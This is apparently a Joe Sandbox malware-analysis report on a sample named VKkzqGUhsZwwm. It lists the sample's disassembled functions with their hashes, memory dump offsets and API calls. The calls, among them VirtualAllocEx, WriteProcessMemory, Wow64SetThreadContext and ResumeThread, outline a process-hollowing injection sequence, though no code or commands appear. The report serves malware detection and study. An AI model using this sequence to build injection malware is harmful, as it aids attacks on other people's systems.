                                  • Snapshot File: hcaresult_10_2_6b80000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: 2f945b35d3f25655142d5ef5e74c2a2f9b8dca701b60623f1fdbfe64e02b67c9
                                  • Instruction ID: f73e0157c32fd6e6bb286e0d1b69fd73817186aa5d1624bc58070ea0557ad8b8
                                  • Opcode Fuzzy Hash: 2f945b35d3f25655142d5ef5e74c2a2f9b8dca701b60623f1fdbfe64e02b67c9
                                  • Instruction Fuzzy Hash: 2D2127B59003199FDB10DFAAC985BEEBBF5FF48310F10842AE919A7250D7789944CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06B84AD8
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2046923728.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6b80000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: 7910d168003a5e9baf318d19b5037cc8182c514e3ad8281671491df014edba63
                                  • Instruction ID: e5ed6ff4420843b34f234369978f482cec73d3958705904f8753e2259a74751c
                                  • Opcode Fuzzy Hash: 7910d168003a5e9baf318d19b5037cc8182c514e3ad8281671491df014edba63
                                  • Instruction Fuzzy Hash: 1E2139B1D003099FCB10DFAAC985BEEBBF5FF48310F108429E919A7250C7789944CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06B8492E
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2046923728.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6b80000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: ce4f34df74e2ca0c1b12e992392a6b1f5d29fdf81fb18d4d4374df16d603546d
                                  • Instruction ID: deeea7fc9e33e8787630c0ba8ce6302cc8aa77c1ce6cd0ff9eaf1882add2d0ba
                                  • Opcode Fuzzy Hash: ce4f34df74e2ca0c1b12e992392a6b1f5d29fdf81fb18d4d4374df16d603546d
                                  • Instruction Fuzzy Hash: D4216DB1D003098FDB10DFAAC5857EEBBF4EF48314F108429D459A7241C7789545CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0251D306,?,?,?,?,?), ref: 0251D3C7
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2042281318.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_2510000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: efd98c3be33eb8a74da417bf3de3859295eb77f0aa325b0ecc3a4c362ad26182
                                  • Instruction ID: 3c4795787bb15e17a39b1cbb7c3e6e06c08ce4dbc0c6e6d59427a70662061efc
                                  • Opcode Fuzzy Hash: efd98c3be33eb8a74da417bf3de3859295eb77f0aa325b0ecc3a4c362ad26182
                                  • Instruction Fuzzy Hash: 0B21E6B59012089FDB10CF9AD584AEEFFF4FB48314F14845AE914A7310D378A954CFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0251D306,?,?,?,?,?), ref: 0251D3C7
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2042281318.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_2510000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: 920b5ebbc138211ad54131583b11d7db1208761e814de27fd91c23e678bd7a4f
                                  • Instruction ID: c0364e2068cc73f07718fb1262af6fc0a759d8258b93d6f4e1a36e3fa44c9c39
                                  • Opcode Fuzzy Hash: 920b5ebbc138211ad54131583b11d7db1208761e814de27fd91c23e678bd7a4f
                                  • Instruction Fuzzy Hash: CA21E4B5900208AFDB10CF9AD984ADEBFF9FB48314F14841AE918A3310C378A940CFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06B84BB8
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2046923728.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6b80000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: bb7290577a5d400aff5d23d17f201581c3c7e1c27fb2585aad9fa39d4374c072
                                  • Instruction ID: f593e932f5782169583b054957c374ff5dd2db7bc6d36429cba853e57747b46d
                                  • Opcode Fuzzy Hash: bb7290577a5d400aff5d23d17f201581c3c7e1c27fb2585aad9fa39d4374c072
                                  • Instruction Fuzzy Hash: 6021F5B1C003599FDB10DFAAC985AEEBBF5FF48310F50842AE519A7250C7789944DBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06B84BB8
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2046923728.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6b80000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: 1e4d1e90f0e40f01a1707613042d2c09e543df45041352cecb64f3c9fd4b5abb
                                  • Instruction ID: 83ed43e181ad6bdd835aed734e72bad5e367034266659cb24a84e9b939710b4d
                                  • Opcode Fuzzy Hash: 1e4d1e90f0e40f01a1707613042d2c09e543df45041352cecb64f3c9fd4b5abb
                                  • Instruction Fuzzy Hash: F921F5B1C003599FDB10DFAAC985AEEBBF5FF48310F50842AE519A7250C7789944DBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06B8492E
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2046923728.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6b80000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: 0b2a13c6007166bd0f7dfa37ee09f7c5e4f5f0ede506aed6d2a1738531bc3da8
                                  • Instruction ID: bbe14b92de051854c651cdba80cb0071c791262a15e9fb8b311ffb991bc3e74a
                                  • Opcode Fuzzy Hash: 0b2a13c6007166bd0f7dfa37ee09f7c5e4f5f0ede506aed6d2a1738531bc3da8
                                  • Instruction Fuzzy Hash: 6C215BB1D003098FDB10DFAAC9857EEBBF4EF48324F108429D459A7241CB789944CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06B849F6
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2046923728.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6b80000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: f84465078848fc562dac0678d00c5400b24e24e2b1b8121de2bcacbb93b3dd84
                                  • Instruction ID: 281af91dbd14695853a7c858fa3767629e4d663e0a2bde52265097d3959df15b
                                  • Opcode Fuzzy Hash: f84465078848fc562dac0678d00c5400b24e24e2b1b8121de2bcacbb93b3dd84
                                  • Instruction Fuzzy Hash: 751129718002499FDB20DFAAC945BDFBFF5EF48320F248419E559A7250C775A584CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0251B141,00000800,00000000,00000000), ref: 0251B352
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2042281318.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_2510000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: aa46d7e3fe2d0f8c43d8d978992dbc89117b11a08874a3a5b1fa727ccd814d4a
                                  • Instruction ID: b6db44eed4f4ec31e8a7fb005014cecc1b5f4f44ae013701620ca034dddac979
                                  • Opcode Fuzzy Hash: aa46d7e3fe2d0f8c43d8d978992dbc89117b11a08874a3a5b1fa727ccd814d4a
                                  • Instruction Fuzzy Hash: D21126B69003099FDB14CF9AC444ADEFBF4FB48314F10846AE519A7210C379A945CFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0251B141,00000800,00000000,00000000), ref: 0251B352
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2042281318.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_2510000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 97a83349568c63bf8b9090b27dc7b236b07f0ff38e75b0ec18ef361172fd0f17
                                  • Instruction ID: ed00ae1dd4b38a696dff24801788a75fc002dae5318175785494afdbbeaf8d82
                                  • Opcode Fuzzy Hash: 97a83349568c63bf8b9090b27dc7b236b07f0ff38e75b0ec18ef361172fd0f17
                                  • Instruction Fuzzy Hash: 861112B69003498FDB14DFAAC484ADEFBF5BB48318F14846AE819A7210C379A545CFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06B849F6
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2046923728.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6b80000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 0c7f6d6b36ee45d838239a960c09bdd7d63479395186437a1aa644b4fb3da2c0
                                  • Instruction ID: be2eaace2278fc4ab8377a05157d2eaa32624a2fb2c8fabbaf2c2e83fbfe3dec
                                  • Opcode Fuzzy Hash: 0c7f6d6b36ee45d838239a960c09bdd7d63479395186437a1aa644b4fb3da2c0
                                  • Instruction Fuzzy Hash: 4D1149B18002499FCB10DFAAC844BEFBFF5EF48320F108419E519A7250C779A940CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2046923728.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6b80000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 2f061ca724fa94c8e696ea097deafd931d15fb90331bea34333c71dbb643b18b
                                  • Instruction ID: 0af3d598ec738b1996ab63d64e3a9fc99dc98db596c1ffa9e682517948f3a46d
                                  • Opcode Fuzzy Hash: 2f061ca724fa94c8e696ea097deafd931d15fb90331bea34333c71dbb643b18b
                                  • Instruction Fuzzy Hash: EA1128B1D002498FDB20DFAAC8457AFFBF5EF88724F108459D519A7250CB79A944CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 06B87C75
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2046923728.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6b80000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: cbcc32b1bc0ab2abeac272cccc682dd54dc87bf4930a976e387e6be78f5285c0
                                  • Instruction ID: a169168a2b41408df4df6be572fb1e07936bfd031f4a649d2e41feb5ca513254
                                  • Opcode Fuzzy Hash: cbcc32b1bc0ab2abeac272cccc682dd54dc87bf4930a976e387e6be78f5285c0
                                  • Instruction Fuzzy Hash: CE1113B58003489FCB10DF9AC845BDEBBF8FF48324F208459E558A3210C375A584CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2046923728.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6b80000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 658128819136768f5f78eaa0cacb48c70d49ec6a3beb8a4e6c5966c5b788b9e1
                                  • Instruction ID: f641a59e19e4feb92eb77352ac526d5c3097fdd664d43945b4924fdf20ab5cd9
                                  • Opcode Fuzzy Hash: 658128819136768f5f78eaa0cacb48c70d49ec6a3beb8a4e6c5966c5b788b9e1
                                  • Instruction Fuzzy Hash: 901136B1D003498FDB20DFAAC8457AFFBF5EF88724F208459D519A7250CB79A944CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0251B0C6
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2042281318.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_2510000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 03dbffec7646dd0aa5a185f997a002cbc0e4a061151e62b02133f9958d7cbd83
                                  • Instruction ID: 13278053b04f28130b9f3ecb8d223cd628fcaebdb2934268589104c862dbc22d
                                  • Opcode Fuzzy Hash: 03dbffec7646dd0aa5a185f997a002cbc0e4a061151e62b02133f9958d7cbd83
                                  • Instruction Fuzzy Hash: 6111DFB5C003498FDB20DF9AD444AEEFBF4FF89228F10845AD429A7610C379A545CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 06B87C75
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2046923728.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6b80000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: f4ed5aa4caa987bf584cd8967965dbbbbeb06daf800843bf3b0bb26756d42bd3
                                  • Instruction ID: cb58c13d737b0b707227e133280b25161ac65d08c4e3ac7efa4bc85f383ab0c5
                                  • Opcode Fuzzy Hash: f4ed5aa4caa987bf584cd8967965dbbbbeb06daf800843bf3b0bb26756d42bd3
                                  • Instruction Fuzzy Hash: 661106B5800348DFDB10DF9AC984BDEBFF8EB48314F208469E518A7211C375A944CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2041630848.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_afd000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b4a3f2f66d925d766c4ec6ab41b19c481dd5e6a5dbc156ee60717f594c17bea4
                                  • Instruction ID: b93ff6f85d17820871a55abd516d1d74c2ee53e2620976cd237a9399073c5dd7
                                  • Opcode Fuzzy Hash: b4a3f2f66d925d766c4ec6ab41b19c481dd5e6a5dbc156ee60717f594c17bea4
                                  • Instruction Fuzzy Hash: 6F212571500248DFCB16DF94D9C0F36BF66FB98318F20C569EA090B256C33AD816DBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2041630848.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_afd000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 484482a787d46f1d9cada3d909112e22a84e3bf39d0ba46897e10f7c444d3344
                                  • Instruction ID: 07430492ab13002f14761e7412ce18f1ff14117433986129bdb1795464ad2185
                                  • Opcode Fuzzy Hash: 484482a787d46f1d9cada3d909112e22a84e3bf39d0ba46897e10f7c444d3344
                                  • Instruction Fuzzy Hash: F7212871500208DFDB06DF54D9C0F26BF66FB98315F20C569EA090B256C33AE856D7A2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2041784763.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_b0d000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a585199f1eb0f0521e983aabc6429edef56399b1bb0a5c9193fc5803958ab365
                                  • Instruction ID: 309e16eec22965918ca53503f6cba4e50dc238b0bed117d51dfa923b30036867
                                  • Opcode Fuzzy Hash: a585199f1eb0f0521e983aabc6429edef56399b1bb0a5c9193fc5803958ab365
                                  • Instruction Fuzzy Hash: 5D21C271604204EFDB05DFA4D9C0B26BFA5FB88314F24C5ADE9494B2D6C33AD856CA61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2041784763.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_b0d000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8686021a57d32f4a25ac9c7353730787b70640f1a57970397d789f6888ffc2c5
                                  • Instruction ID: 482b8193c0b8e1f2858db921619f446221ef8d6f74f24a559ba0e76b60d0b2f0
                                  • Opcode Fuzzy Hash: 8686021a57d32f4a25ac9c7353730787b70640f1a57970397d789f6888ffc2c5
                                  • Instruction Fuzzy Hash: 7F21D071604204DFDB14DF64D9D4B26BFA5FB88314F20C5A9D94E4B2D6D33AD806CA62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2041784763.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_b0d000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4bb8aeb605a391f26e439954aec2c3b1cba5b28b04ec25ab15d200bf674e6595
                                  • Instruction ID: 52d3f4bb649e1a86de0075c2815c593dc2322a6caf850028a8294fa617e695b3
                                  • Opcode Fuzzy Hash: 4bb8aeb605a391f26e439954aec2c3b1cba5b28b04ec25ab15d200bf674e6595
                                  • Instruction Fuzzy Hash: 0F2192755083809FCB02CF54D994B11BFB1FB46314F28C5DAD8498F2A7D33A980ACB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2041630848.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_afd000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                  • Instruction ID: cee1cbcc48676d0302824d15f91addf646a5361bbe6b6db6d116264bf7f2d698
                                  • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                  • Instruction Fuzzy Hash: BD112672404284CFCF02CF50D5C4B26BF72FB98314F24C6A9E9490B256C336D85ADBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2041630848.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_afd000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                  • Instruction ID: 8f76cfaec6b85c7fda3b79b5513c4549dcb333564aec678755d07a6610038d0f
                                  • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                  • Instruction Fuzzy Hash: FB112672404244CFCB02CF40D5C4B26BF72FB94324F24C6A9E9090B656C33AE85ACBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2041784763.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_b0d000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2041630848.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_afd000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2041630848.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_afd000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:12.9%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:9
                                  Total number of Limit Nodes:2
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LRjq$LRjq
                                  • API String ID: 0-348097489
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3242316028.0000000005F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_5f40000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,05F4E1EA), ref: 05F4E2D7
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3242316028.0000000005F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_5f40000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: GlobalMemoryStatus
                                  • String ID:
                                  • API String ID: 1890195054-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: PHjq
                                  • API String ID: 0-751881793
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: PHjq
                                  • API String ID: 0-751881793
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LRjq
                                  • API String ID: 0-665714880
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
